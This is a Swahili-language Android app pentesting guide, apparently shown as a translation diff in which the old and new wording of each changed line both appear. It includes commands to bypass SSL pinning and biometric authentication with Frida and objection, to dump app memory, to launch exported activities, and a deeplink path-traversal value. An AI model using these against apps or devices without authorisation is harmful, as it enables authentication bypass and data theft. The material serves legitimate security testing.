Ili **kufunga huduma za google** (kama AppStore) katika Genymotion unahitaji kubofya kitufe kilichoshindwa kwa rangi nyekundu katika picha ifuatayo:
Ili **kufunga huduma za google** (kama AppStore) katika Genymotion unahitaji kubofya kitufe kilichochorwa kwa rangi nyekundu kwenye picha ifuatayo:
![](<../../images/image (277).png>)
@ -257,7 +257,7 @@ Unahitaji kuwasha **chaguzi za ufuatiliaji** na itakuwa vizuri ikiwa unaweza **k
2. (Kuanzia Android 8.0) Chagua **Mfumo**.
3. Chagua **Kuhusu simu**.
4. Bonyeza **Nambari ya Ujenzi** mara 7.
5. Rudi nyuma na utapata **Chaguzi za Wataalamu**.
5. Rudi nyuma na utaona **Chaguzi za Wataalamu**.
> Mara tu umepakia programu, jambo la kwanza unapaswa kufanya ni kujaribu na kuchunguza inafanya nini, inafanya kazi vipi na kuweza kuizoea.\
> Nitapendekeza **kufanya uchambuzi huu wa awali wa kijamii kwa kutumia MobSF uchambuzi wa kijamii + pidcat**, ili tuweze **kujifunza jinsi programu inavyofanya kazi** wakati MobSF **inakamata** data nyingi **za kuvutia** ambazo unaweza kupitia baadaye.
@ -284,7 +284,7 @@ Kama pentester, **jaribu kuangalia kumbukumbu hizi**.
**Data za Uchambuzi Zinatumwa kwa Vyama vya Tatu**
Programu mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza bila kukusudia **kuvuja data nyeti** kutokana na utekelezaji usiofaa na wakandarasi. Ili kubaini uwezekano wa kuvuja kwa data, inapendekezwa **kuingilia trafiki ya programu** na kuangalia ikiwa kuna taarifa nyeti zinazotumwa kwa huduma za vyama vya tatu.
Programu mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza bila kukusudia **kuvuja data nyeti** kutokana na utekelezaji usio sahihi na wakandarasi. Ili kubaini uwezekano wa kuvuja kwa data, inapendekezwa **kuingilia trafiki ya programu** na kuangalia kama kuna taarifa nyeti zinazotumwa kwa huduma za vyama vya tatu.
### SQLite DBs
@ -293,11 +293,11 @@ Maktaba zinapaswa kuwa katika `/data/data/the.package.name/databases` kama `/dat
Ikiwa maktaba inahifadhi taarifa za siri na ime **fichwa** lakini unaweza **kupata** **nywila** ndani ya programu bado ni **udhaifu**.
Taja meza kwa kutumia `.tables` na taja safu za meza kwa kufanya `.schema <table_name>`
Panga meza kwa kutumia `.tables` na panga safu za meza kwa kufanya `.schema <table_name>`
### Drozer (Shughuli za Kutekeleza, Watoa Maudhui na Huduma)
Kutoka [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** inakuruhusu **kuchukua jukumu la programu ya Android** na kuingiliana na programu nyingine. Inaweza kufanya **chochote ambacho programu iliyosakinishwa inaweza kufanya**, kama kutumia mfumo wa Mawasiliano ya Kati ya Mchakato wa Android (IPC) na kuingiliana na mfumo wa uendeshaji wa chini. .\
Kutoka [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** inakuwezesha **kuchukua jukumu la programu ya Android** na kuingiliana na programu nyingine. Inaweza kufanya **chochote ambacho programu iliyosakinishwa inaweza kufanya**, kama kutumia mfumo wa Mawasiliano ya Mchakato wa Android (IPC) na kuingiliana na mfumo wa uendeshaji wa chini. .\
Drozer ni chombo muhimu kwa **kufanya udhaifu wa shughuli zilizotolewa, huduma zilizotolewa na Watoa Maudhui** kama utakavyofundishwa katika sehemu zifuatazo.
### Kufanya Udhaifu wa Shughuli Zilizotolewa
@ -307,18 +307,18 @@ Pia kumbuka kwamba msimbo wa shughuli huanza katika **`onCreate`** njia.
**Kupita Uthibitishaji**
Wakati shughuli imewekwa wazi unaweza kuita skrini yake kutoka programu ya nje. Kwa hivyo, ikiwa shughuli yenye **taarifa nyeti** ime **wekwa wazi** unaweza **kupita** mitambo ya **uthibitishaji** **ili kuipata.**
Wakati shughuli inapotolewa unaweza kuita skrini yake kutoka programu ya nje. Kwa hivyo, ikiwa shughuli yenye **taarifa nyeti** ime **tolewa** unaweza **kupita** mitambo ya **uthibitishaji** **ili kuipata.**
[**Jifunze jinsi ya kufanya udhaifu wa shughuli zilizotolewa na Drozer.**](drozer-tutorial/#activities)
Unaweza pia kuanzisha shughuli iliyowekwa wazi kutoka adb:
Unaweza pia kuanzisha shughuli iliyotolewa kutoka adb:
- Jina la Kifurushi ni com.example.demo
- Jina la Shughuli iliyowekwa wazi ni com.example.test.MainActivity
- Jina la Shughuli iliyotolewa ni com.example.test.MainActivity
```bash
adb shell am start -n com.example.demo/com.example.test.MainActivity
```
**KUMBUKA**: MobSF itagundua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika shughuli, lakini kutokana na [hii](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), kwa wazi hii ni hatari tu katika toleo za zamani (API versions < 21).
**KUMBUKA**: MobSF itagundua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika shughuli, lakini kutokana na [hii](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu katika toleo za zamani (API versions < 21).
> [!KUMBUKA]
> Kumbuka kwamba kupita kwa idhini si kila wakati udhaifu, itategemea jinsi kupita kunavyofanya kazi na ni taarifa gani zinazoonyeshwa.
@ -381,7 +381,7 @@ Kila wakati unapotafuta deeplink hakikisha kuwa **haipokei data nyeti (kama nywi
**Parameters in path**
Unapaswa **kuangalia pia kama deeplink yoyote inatumia parameter ndani ya njia** ya URL kama: `https://api.example.com/v1/users/{username}` , katika kesi hiyo unaweza kulazimisha upitishaji wa njia kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
Kumbuka kwamba ikiwa utapata mwisho sahihi ndani ya programu unaweza kuwa na uwezo wa kusababisha **Open Redirect** (ikiwa sehemu ya njia inatumika kama jina la kikoa), **account takeover** (ikiwa unaweza kubadilisha maelezo ya watumiaji bila CSRF token na mwisho ulio hatarini unatumia njia sahihi) na hatari nyingine yoyote. Maelezo zaidi [hapa](http://dphoeniixx.com/2020/12/13-2/).
Kumbuka kwamba ikiwa utapata mwisho sahihi ndani ya programu unaweza kuwa na uwezo wa kusababisha **Open Redirect** (ikiwa sehemu ya njia inatumika kama jina la domain), **account takeover** (ikiwa unaweza kubadilisha maelezo ya watumiaji bila CSRF token na mwisho ulio na vuln unatumia njia sahihi) na vuln nyingine yoyote. Maelezo zaidi [hapa](http://dphoeniixx.com/2020/12/13-2/).
**More examples**
@ -390,42 +390,42 @@ Ripoti ya [bug bounty](https://hackerone.com/reports/855618) kuhusu viungo (_/.w
### Transport Layer Inspection and Verification Failures
- **Vyeti havikaguliwi kila wakati ipasavyo** na programu za Android. Ni kawaida kwa programu hizi kupuuza onyo na kukubali vyeti vilivyojitegemea au, katika baadhi ya matukio, kurudi kutumia muunganisho wa HTTP.
- **Majadiliano wakati wa handshake ya SSL/TLS wakati mwingine ni dhaifu**, yakitumia cipher suites zisizo salama. Uthibitisho huu unafanya muunganisho uwe hatarini kwa mashambulizi ya mtu katikati (MITM), ikiruhusu washambuliaji kufungua data.
- **Kuenea kwa taarifa za kibinafsi** ni hatari wakati programu zinathibitisha kwa kutumia njia salama lakini kisha kuwasiliana kupitia njia zisizo salama kwa shughuli nyingine. Njia hii inashindwa kulinda data nyeti, kama vile cookies za kikao au maelezo ya mtumiaji, kutokana na kukamatwa na wahalifu.
- **Majadiliano wakati wa handshake ya SSL/TLS wakati mwingine ni dhaifu**, yakitumia cipher suites zisizo salama. Uthibitisho huu unafanya muunganisho uwe hatarini kwa mashambulizi ya mtu katikati (MITM), kuruhusu washambuliaji kufungua data.
- **Kuvuja kwa taarifa za kibinafsi** ni hatari wakati programu zinathibitisha kwa kutumia njia salama lakini kisha kuwasiliana kupitia njia zisizo salama kwa shughuli nyingine. Njia hii inashindwa kulinda data nyeti, kama vile cookies za kikao au maelezo ya mtumiaji, kutokana na kukamatwa na wahalifu.
#### Certificate Verification
Tutazingatia **uthibitishaji wa cheti**. Uadilifu wa cheti cha seva lazima uhakikishwe ili kuongeza usalama. Hii ni muhimu kwa sababu usanidi usio salama wa TLS na uhamasishaji wa data nyeti kupitia njia zisizo na usalama zinaweza kuleta hatari kubwa. Kwa hatua za kina za kuthibitisha vyeti vya seva na kushughulikia hatari, [**rasilimali hii**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo wa kina.
Tutazingatia **uthibitishaji wa cheti**. Uadilifu wa cheti cha seva lazima uhakikishwe ili kuongeza usalama. Hii ni muhimu kwa sababu mipangilio isiyo salama ya TLS na uhamasishaji wa data nyeti kupitia njia zisizo na usalama zinaweza kuleta hatari kubwa. Kwa hatua za kina za kuthibitisha vyeti vya seva na kushughulikia udhaifu, [**rasilimali hii**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo wa kina.
#### SSL Pinning
SSL Pinning ni hatua ya usalama ambapo programu inathibitisha cheti cha seva dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya programu yenyewe. Njia hii ni muhimu kwa kuzuia mashambulizi ya MITM. Kutekeleza SSL Pinning kunashauriwa kwa nguvu kwa programu zinazoshughulikia taarifa nyeti.
SSL Pinning ni hatua ya usalama ambapo programu inathibitisha cheti cha seva dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya programu yenyewe. Njia hii ni muhimu kwa kuzuia mashambulizi ya MITM. Kutekeleza SSL Pinning kunapendekezwa kwa nguvu kwa programu zinazoshughulikia taarifa nyeti.
#### Traffic Inspection
Ili kukagua trafiki ya HTTP, ni lazima **kusakinisha cheti cha zana ya proxy** (mfano, Burp). Bila kusakinisha cheti hii, trafiki iliyosimbwa inaweza isionekane kupitia proxy. Kwa mwongozo wa kusakinisha cheti ya CA ya kawaida, [**bonyeza hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Ili kukagua trafiki ya HTTP, ni muhimu **kusanidi cheti cha zana ya proxy** (mfano, Burp). Bila kusanidi cheti hiki, trafiki iliyosimbwa inaweza isionekane kupitia proxy. Kwa mwongozo wa kusanidi cheti cha CA cha kawaida, [**bonyeza hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Programu zinazolenga **API Level 24 na zaidi** zinahitaji marekebisho kwenye Usanidi wa Usalama wa Mtandao ili kukubali cheti cha CA cha proxy. Hatua hii ni muhimu kwa kukagua trafiki iliyosimbwa. Kwa maelekezo ya kubadilisha Usanidi wa Usalama wa Mtandao, [**rejea kwenye tutorial hii**](make-apk-accept-ca-certificate.md).
Programu zinazolenga **API Level 24 na zaidi** zinahitaji mabadiliko kwenye Network Security Config ili kukubali cheti cha CA cha proxy. Hatua hii ni muhimu kwa kukagua trafiki iliyosimbwa. Kwa maelekezo ya kubadilisha Network Security Config, [**rejea kwenye tutorial hii**](make-apk-accept-ca-certificate.md).
#### Bypassing SSL Pinning
Wakati SSL Pinning inatekelezwa, kuipita inakuwa muhimu ili kukagua trafiki ya HTTPS. Njia mbalimbali zinapatikana kwa kusudi hili:
- Kiotomatiki **badilisha** **apk** ili **kuipita** SSLPinning kwa kutumia [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). Faida bora ya chaguo hili ni kwamba hutahitaji root ili kuipita SSL Pinning, lakini utahitaji kufuta programu na kusakinisha mpya, na hii haitafanya kazi kila wakati.
- Unaweza kutumia **Frida** (iliyajadiliwa hapa chini) ili kuipita ulinzi huu. Hapa kuna mwongozo wa kutumia Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- Kiotomatiki **badilisha** **apk** ili **kuipita** SSLPinning kwa kutumia [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). Faida bora ya chaguo hili, ni kwamba hutahitaji root ili kuipita SSL Pinning, lakini utahitaji kufuta programu na kuisakinisha mpya, na hii haitafanya kazi kila wakati.
- Unaweza kutumia **Frida** (iliyozungumziwa hapa chini) kuipita ulinzi huu. Hapa kuna mwongozo wa kutumia Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- Unaweza pia kujaribu **kuipita SSL Pinning kiotomatiki** kwa kutumia [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
- Unaweza pia kujaribu **kuipita SSL Pinning kiotomatiki** kwa kutumia **MobSF dynamic analysis** (iliyofafanuliwa hapa chini)
- Ikiwa bado unafikiri kuna trafiki ambayo hujapata unaweza kujaribu **kupeleka trafiki kwa burp kwa kutumia iptables**. Soma blog hii: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
#### Looking for Common Web Vulnerabilities
Ni muhimu pia kutafuta hatari za kawaida za wavuti ndani ya programu. Maelezo ya kina juu ya kutambua na kupunguza hatari hizi yapo nje ya muhtasari huu lakini yanashughulikiwa kwa kina mahali pengine.
Ni muhimu pia kutafuta udhaifu wa kawaida wa wavuti ndani ya programu. Maelezo ya kina juu ya kutambua na kupunguza udhaifu hizi yapo nje ya upeo wa muhtasari huu lakini yanashughulikiwa kwa kina mahali pengine.
### Frida
[Frida](https://www.frida.re) ni zana ya uhandisi wa dynamic kwa waendelezaji, wahandisi wa kurudi, na watafiti wa usalama.\
**Unaweza kufikia programu inayotembea na kuunganisha mbinu wakati wa wakati wa kukimbia kubadilisha tabia, kubadilisha thamani, kutoa thamani, kukimbia code tofauti...**\
Ikiwa unataka kufanya pentest kwa programu za Android unahitaji kujua jinsi ya kutumia Frida.
Ikiwa unataka kufanya pentest kwenye programu za Android unahitaji kujua jinsi ya kutumia Frida.
- Jifunze jinsi ya kutumia Frida: [**Frida tutorial**](frida-tutorial/)
- Baadhi ya "GUI" kwa vitendo na Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
@ -437,7 +437,7 @@ Ikiwa unataka kufanya pentest kwa programu za Android unahitaji kujua jinsi ya k
Angalia ikiwa programu inahifadhi taarifa nyeti ndani ya kumbukumbu ambayo haipaswi kuhifadhiwa kama nywila au maneno ya kukumbuka.
Kwa kutumia [**Fridump3**](https://github.com/rootbsd/fridump3) unaweza kutupa kumbukumbu ya programu kwa:
Kwa kutumia [**Fridump3**](https://github.com/rootbsd/fridump3) unaweza dump kumbukumbu ya programu kwa:
```bash
# With PID
python3 fridump3.py -u <PID>
@ -466,15 +466,15 @@ Kwa kutumia skripti ifuatayo ya Frida inaweza kuwa inawezekana **kuzidi uthibiti
```bash
frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f <app.package>
```
### **Picha za Nyuma**
### **Picha za Muktadha**
Unapoweka programu katika hali ya nyuma, Android huhifadhi **picha ya programu** ili wakati inaporejeshwa kwenye hali ya mbele inaanza kupakia picha kabla ya programu ili ionekane kama programu imepakiwa haraka.
Unapoweka programu katika muktadha, Android huhifadhi **picha ya programu** ili wakati inaporejeshwa kwenye mbele inaanza kupakia picha kabla ya programu ili ionekane kama programu imepakiwa haraka.
Hata hivyo, ikiwa picha hii ina **habari nyeti**, mtu mwenye ufikiaji wa picha hiyo anaweza **kuchukua habari hiyo** (kumbuka unahitaji root ili kuweza kuifikia).
Hata hivyo, ikiwa picha hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa picha hiyo anaweza **kuchukua taarifa hiyo** (kumbuka kuwa unahitaji root ili kuweza kuifikia).
Picha hizo kawaida huhifadhiwa katika: **`/data/system_ce/0/snapshots`**
Picha hizo kwa kawaida huhifadhiwa katika: **`/data/system_ce/0/snapshots`**
Android inatoa njia ya **kuzuia upigaji picha wa skrini kwa kuweka kipimo cha FLAG_SECURE**. Kwa kutumia bendera hii, maudhui ya dirisha yanachukuliwa kama salama, kuzuia kuonekana katika picha za skrini au kuonekana kwenye onyesho lisilo salama.
Android inatoa njia ya **kuzuia upigaji picha wa skrini kwa kuweka kipimo cha FLAG_SECURE**. Kwa kutumia bendera hii, maudhui ya dirisha yanachukuliwa kama salama, na kuzuia kuonekana katika picha za skrini au kuonekana kwenye onyesho lisilo salama.
```bash
getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
```
@ -484,7 +484,7 @@ Chombo hiki kinaweza kukusaidia kusimamia zana tofauti wakati wa uchambuzi wa dy
### Kuingilia kwa Intent
Wak developers mara nyingi huunda vipengele vya proxy kama shughuli, huduma, na wapokeaji wa matangazo ambao hushughulikia hizi Intents na kuzipitisha kwa mbinu kama `startActivity(...)` au `sendBroadcast(...)`, ambayo inaweza kuwa hatari.
Wak developers mara nyingi huunda vipengele vya proxy kama shughuli, huduma, na wapokeaji wa matangazo vinavyoshughulikia hizi Intents na kuzipitisha kwa mbinu kama `startActivity(...)` au `sendBroadcast(...)`, ambayo inaweza kuwa hatari.
Hatari iko katika kuruhusu washambuliaji kuanzisha vipengele vya programu visivyoweza kusambazwa au kufikia watoa maudhui nyeti kwa kuhamasisha hizi Intents. Mfano maarufu ni kipengele cha `WebView` kinachobadilisha URLs kuwa vitu vya `Intent` kupitia `Intent.parseUri(...)` na kisha kuvitenda, ambayo inaweza kusababisha kuingilia kwa Intents zenye uharibifu.
@ -499,15 +499,15 @@ Hatari iko katika kuruhusu washambuliaji kuanzisha vipengele vya programu visivy
Labda unajua kuhusu aina hii ya udhaifu kutoka kwa Wavuti. Lazima uwe makini sana na udhaifu huu katika programu ya Android:
- **SQL Injection:** Unaposhughulikia maswali ya dynamic au Watoa-Maudhui hakikisha unatumia maswali yaliyowekwa.
- **SQL Injection:** Unaposhughulika na maswali ya dynamic au Watoa-Maudhui hakikisha unatumia maswali yaliyowekwa.
- **JavaScript Injection (XSS):** Hakikisha kuwa msaada wa JavaScript na Plugin umezimwa kwa WebViews yoyote (umezimwa kwa default). [Maelezo zaidi hapa](webview-attacks.md#javascript-enabled).
- **Ujumuishaji wa Faili za Mitaa:** WebViews zinapaswa kuwa na ufikiaji wa mfumo wa faili umezimwa (umewezeshwa kwa default) - `(webview.getSettings().setAllowFileAccess(false);)`. [Maelezo zaidi hapa](webview-attacks.md#javascript-enabled).
- **Inclusion ya Faili za Mitaa:** WebViews zinapaswa kuwa na ufikiaji wa mfumo wa faili umezimwa (umewezeshwa kwa default) - `(webview.getSettings().setAllowFileAccess(false);)`. [Maelezo zaidi hapa](webview-attacks.md#javascript-enabled).
- **Cookies za Milele**: Katika kesi kadhaa wakati programu ya android inamaliza kikao, cookie haifutwi au inaweza hata kuhifadhiwa kwenye diski.
- [**Lipu la Usalama** katika cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
- [**Bendera Salama** katika cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
---
## Uchambuzi wa Otomatiki
## Uchambuzi wa Kiotomatiki
### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
@ -523,7 +523,7 @@ docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
Kumbuka kwamba MobSF inaweza kuchambua **Android**(apk)**, IOS**(ipa) **na Windows**(apx) programu (_Programu za Windows lazima zichambuliwe kutoka kwa MobSF iliyosakinishwa kwenye mwenyeji wa Windows_).\
Pia, ikiwa unaunda faili la **ZIP** na msimbo wa chanzo wa programu ya **Android** au **IOS** (nenda kwenye folda ya mzizi ya programu, chagua kila kitu na uunde faili la ZIP), itakuwa na uwezo wa kuchambua pia.
MobSF pia inakuwezesha **diff/Compare** uchambuzi na kuunganisha **VirusTotal** (utahitaji kuweka funguo yako ya API katika _MobSF/settings.py_ na kuifanya iweze: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, kisha **hash** itakuwa **upload** badala ya faili.
MobSF pia inakuwezesha **diff/Compare** uchambuzi na kuunganisha **VirusTotal** (utahitaji kuweka funguo yako ya API katika _MobSF/settings.py_ na kuifanya iweze: `VT_ENABLED = TRUE` `VT_API_KEY = <Funguo yako ya API>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, kisha **hash** itakuwa **upload** badala ya faili.
### Uchambuzi wa Kisaidizi wa Dynamic na MobSF
@ -538,11 +538,11 @@ Kuanzia toleo la **android > 5**, itaanza **Frida** kiotomatiki na kuweka mipang
**Frida**
Kwa kawaida, itatumia baadhi ya Scripts za Frida ili **kuepuka SSL pinning**, **ugunduzi wa root** na **ugunduzi wa debugger** na **kufuatilia APIs za kuvutia**.\
Kwa kawaida, itatumia pia baadhi ya Scripts za Frida ili **kuepuka SSL pinning**, **ugunduzi wa root** na **ugunduzi wa debugger** na **kufuatilia APIs za kuvutia**.\
MobSF pia inaweza **kuita shughuli zilizofanywa**, kuchukua **picha za skrini** za hizo na **kuhifadhi** kwa ripoti.
Ili **kuanza** upimaji wa dynamic bonyeza kitufe kibichi: "**Start Instrumentation**". Bonyeza "**Frida Live Logs**" kuona logs zinazozalishwa na scripts za Frida na "**Live API Monitor**" kuona kila mwito kwa mbinu zilizoshikiliwa, hoja zilizopitishwa na thamani zilizorejeshwa (hii itaonekana baada ya kubonyeza "Start Instrumentation").\
MobSF pia inakuwezesha kupakia **Frida scripts** zako mwenyewe (ili kutuma matokeo ya scripts zako za Ijumaa kwa MobSF tumia kazi `send()`). Pia ina **scripts kadhaa zilizandikwa awali** ambazo unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu **zinazo**, bonyeza "**Load**" na bonyeza "**Start Instrumentation**" (utaweza kuona logs za hizo scripts ndani ya "**Frida Live Logs**").
MobSF pia inakuwezesha kupakia **scripts zako za Frida** (ili kutuma matokeo ya scripts zako za Ijumaa kwa MobSF tumia kazi `send()`). Pia ina **scripts kadhaa zilizotayarishwa awali** ambazo unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu **zile**, bonyeza "**Load**" na bonyeza "**Start Instrumentation**" (utaweza kuona logs za hizo scripts ndani ya "**Frida Live Logs**").
![](<../../images/image (419).png>)
@ -551,9 +551,9 @@ Zaidi ya hayo, una baadhi ya kazi za ziada za Frida:
- **Enumerate Loaded Classes**: Itachapisha kila darasa lililopakiwa
- **Capture Strings**: Itachapisha kila nyenzo iliyokamatwa wakati wa kutumia programu (sauti nyingi)
- **Capture String Comparisons**: Inaweza kuwa ya manufaa sana. It **onyeshe nyenzo 2 zinazolinganishwa** na ikiwa matokeo yalikuwa Kweli au Uongo.
- **Enumerate Class Methods**: Weka jina la darasa (kama "java.io.File") na itachapisha mbinu zote za darasa hilo.
- **Enumerate Class Methods**: Weka jina la darasa (kama "java.io.File") na itachapisha mbinu zote za darasa.
- **Search Class Pattern**: Tafuta madarasa kwa muundo
- **Trace Class Methods**: **Trace** **darasa zima** (ona pembejeo na matokeo ya mbinu zote za darasa hilo). Kumbuka kwamba kwa kawaida MobSF inafuatilia mbinu kadhaa za kuvutia za Android Api.
- **Trace Class Methods**: **Trace** **darasa zima** (ona pembejeo na matokeo ya mbinu zote za darasa). Kumbuka kwamba kwa kawaida MobSF inafuatilia mbinu kadhaa za kuvutia za Android Api.
Mara tu unapochagua moduli ya ziada unayotaka kutumia unahitaji kubonyeza "**Start Intrumentation**" na utaona matokeo yote katika "**Frida Live Logs**".
@ -576,7 +576,7 @@ Ili kufanya hivyo, _washa Burp -->_ _zimisha Intercept --> katika MobSB HTTPTool
Mara tu unapo maliza uchambuzi wa dynamic na MobSF unaweza kubonyeza "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta udhaifu.
> [!NOTE]
> Baada ya kufanya uchambuzi wa dynamic na MobSF mipangilio ya proxy inaweza kuwa imekosewa na huwezi kuziweka sawa kutoka kwa GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
> Baada ya kufanya uchambuzi wa dynamic na MobSF mipangilio ya proxy inaweza kuwa imepangwa vibaya na huwezi kuziweka kutoka kwa GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
>
> ```
> adb shell settings put global http_proxy :0
@ -595,7 +595,7 @@ Hii ni **chombo kizuri kufanya uchambuzi wa static na GUI**
### [Qark](https://github.com/linkedin/qark)
Chombo hiki kimeundwa kutafuta udhaifu kadhaa **yanayohusiana na usalama wa programu za Android**, iwe katika **msimbo wa chanzo** au **APKs zilizopakiwa**. Chombo hiki pia **kina uwezo wa kuunda "Proof-of-Concept" APK inayoweza kutekelezwa** na **amri za ADB**, ili kutumia baadhi ya udhaifu uliofindika (Shughuli zilizofichuliwa, nia, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa kinachojaribiwa.
Chombo hiki kimeundwa kutafuta **udhaifu kadhaa zinazohusiana na usalama wa programu za Android**, iwe katika **msimbo wa chanzo** au **APKs zilizopakiwa**. Chombo hiki pia ni **capable of creating a "Proof-of-Concept" deployable APK** na **ADB commands**, ili kutumia baadhi ya udhaifu uliofindika (Shughuli zilizo wazi, nia, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa kinachojaribiwa.
```bash
pip3 install --user qark # --user is only needed if not using a virtualenv
qark --apk path/to/my.apk
@ -629,7 +629,7 @@ super-analyzer {apk_file}
StaCoAn ni chombo **crossplatform** ambacho kinawasaidia waendelezaji, wawindaji wa makosa na hackers wa kimaadili kufanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye programu za simu.
Wazo ni kwamba unavuta na kuacha faili yako ya programu ya simu (faili .apk au .ipa) kwenye programu ya StaCoAn na itaunda ripoti ya kuona na kubebeka kwako. Unaweza kubadilisha mipangilio na orodha za maneno ili kupata uzoefu wa kibinafsi.
Wazo ni kwamba unavuta na kuacha faili yako ya programu ya simu (faili .apk au .ipa) kwenye programu ya StaCoAn na itaunda ripoti ya kuona na inayoweza kubebeka kwako. Unaweza kubadilisha mipangilio na orodha za maneno ili kupata uzoefu wa kibinafsi.
Pakua [latest release](https://github.com/vincentcox/StaCoAn/releases):
```
@ -645,11 +645,11 @@ androbugs.exe -f [APK file]
```
### [Androwarn](https://github.com/maaaaz/androwarn)
**Androwarn** ni chombo ambacho lengo lake kuu ni kugundua na kumwonya mtumiaji kuhusu tabia mbaya zinazoweza kutokea zinazotengenezwa na programu ya Android.
**Androwarn** ni chombo chenye lengo kuu la kugundua na kumwonya mtumiaji kuhusu tabia mbaya zinazoweza kutokea zinazotengenezwa na programu ya Android.
Ugunduzi unafanywa kwa **uchambuzi wa statiki** wa bytecode ya Dalvik ya programu, inayowakilishwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard).
Chombo hiki kinatafuta **tabia za kawaida za programu "mbaya"** kama: uhamasishaji wa vitambulisho vya simu, kukamata mtiririko wa sauti/video, mabadiliko ya data ya PIM, utekelezaji wa msimbo wa kiholela...
Chombo hiki kinatafuta **tabia za kawaida za programu "mbaya"** kama: uhamasishaji wa vitambulisho vya simu, upokeaji wa mtiririko wa sauti/video, mabadiliko ya data ya PIM, utekelezaji wa msimbo wa kiholela...
```
python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
```
@ -657,7 +657,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
![](<../../images/image (595).png>)
**MARA** ni **M**obile **A**pplication **R**everse engineering na **A**nalysis Framework. Ni chombo kinachokusanya zana zinazotumika mara kwa mara za uhandisi wa nyuma na uchambuzi wa programu za simu, kusaidia katika kupima programu za simu dhidi ya vitisho vya usalama wa simu vya OWASP. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa watengenezaji wa programu za simu na wataalamu wa usalama.
**MARA** ni **M**ifumo ya **A**pplikasheni ya **R**everse engineering na **A**nalysis. Ni chombo kinachokusanya zana zinazotumika mara kwa mara za reverse engineering na uchambuzi wa programu za simu, kusaidia katika kupima programu za simu dhidi ya vitisho vya usalama wa simu vya OWASP. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa watengenezaji wa programu za simu na wataalamu wa usalama.
Inauwezo wa:
@ -674,7 +674,7 @@ Inafaida kugundua malware: [https://koodous.com/](https://koodous.com)
## Obfuscating/Deobfuscating code
Kumbuka kwamba kulingana na huduma na usanidi unayotumia kuondoa obfuscation ya msimbo. Siri zinaweza kuwa zimeondolewa obfuscated au hazijafanywa hivyo.
Kumbuka kwamba kulingana na huduma na usanidi unayotumia kuondoa obfuscation ya msimbo. Siri zinaweza kuwa zimeondolewa obfuscated au la.
### [ProGuard](<https://en.wikipedia.org/wiki/ProGuard_(software)>)
@ -690,7 +690,7 @@ Pata mwongozo wa hatua kwa hatua wa kuondoa obfuscation ya apk katika [https://b
- kupakia rasilimali kama InputStream;
- kutoa matokeo kwa darasa linalorithi kutoka FilterInputStream ili kuyafungua;
- kufanya obfuscation isiyo na maana ili kupoteza dakika chache za muda kutoka kwa mhandisi wa nyuma;
- kufanya obfuscation isiyo na maana ili kupoteza dakika chache za muda kutoka kwa mrejeshaji;
- kutoa matokeo yaliyofunguliwa kwa ZipInputStream ili kupata faili ya DEX;
- hatimaye kupakia DEX inayotokana kama Rasilimali kwa kutumia njia ya `loadDex`.
